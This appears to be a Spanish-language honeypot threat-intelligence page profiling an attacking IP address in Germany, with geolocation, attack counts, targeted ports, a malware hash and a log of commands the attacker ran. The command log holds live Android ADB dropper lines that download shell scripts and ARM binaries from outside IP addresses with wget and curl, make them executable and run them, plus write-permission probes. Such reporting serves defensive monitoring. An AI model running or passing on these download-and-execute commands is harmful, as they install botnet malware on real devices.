TROYANOSYVIRUS
Amenaza ActivaALTO

45.135.194.73

Pais de Origen🇩🇪 Alemania
Primera Deteccion2/1/2026
Ultima Actividad14/1/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
4357
Ataques Totales
🔌
4
Puertos
📡
3
Tipos Ataque
🦠
1
Malware

Geolocalizacion

Pais
🇩🇪 Alemania
Ciudad
Desconocida
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

honeytrap
tanner
adbhoney

Puertos Atacados

802323555537215

Malware Asociado

cf97c516772c2e8491fb...

Comandos Ejecutados

$rm -rf /data/local/tmp/sys_helper3x
$ls -l /data/local/tmp/sys_helper3x
$cd /data/local/tmp/ ;rm -rf bins.sh; busybox wget http://45.135.194.7/bins.sh; sh bins.sh; curl http://45.135.194.7/bins.sh; sh bins.sh; wget http://45.135.194.7/bins.sh; sh bins.sh; busybox curl http://45.135.194.7/bins.sh; sh bins.sh2x
$curl -k -s -o /data/local/tmp/sys_helper http://196.251.100.100/arm71x
$touch /data/local/tmp/.test_write; if [ -f /data/local/tmp/.test_write ]; then echo WRITABLE; rm /data/local/tmp/.test_write; fi1x
$file /system/bin/linker1x
$getprop ro.product.cpu.abi1x
$cd /data/local/tmp/ ;rm -rf arm7*; busybox wget http://45.135.194.7/arm7; curl http://45.135.194.7/arm7; wget http://45.135.194.7/arm7; busybox curl http://45.135.194.7/arm7; chmod 777 *; ./arm7 adb1x
$touch /storage/emulated/0/.test_write; if [ -f /storage/emulated/0/.test_write ]; then echo WRITABLE; rm /storage/emulated/0/.test_write; fi1x
$touch /data/local/.test_write; if [ -f /data/local/.test_write ]; then echo WRITABLE; rm /data/local/.test_write; fi1x

Evaluacion de Riesgo

70
/100
BajoMedioAltoCritico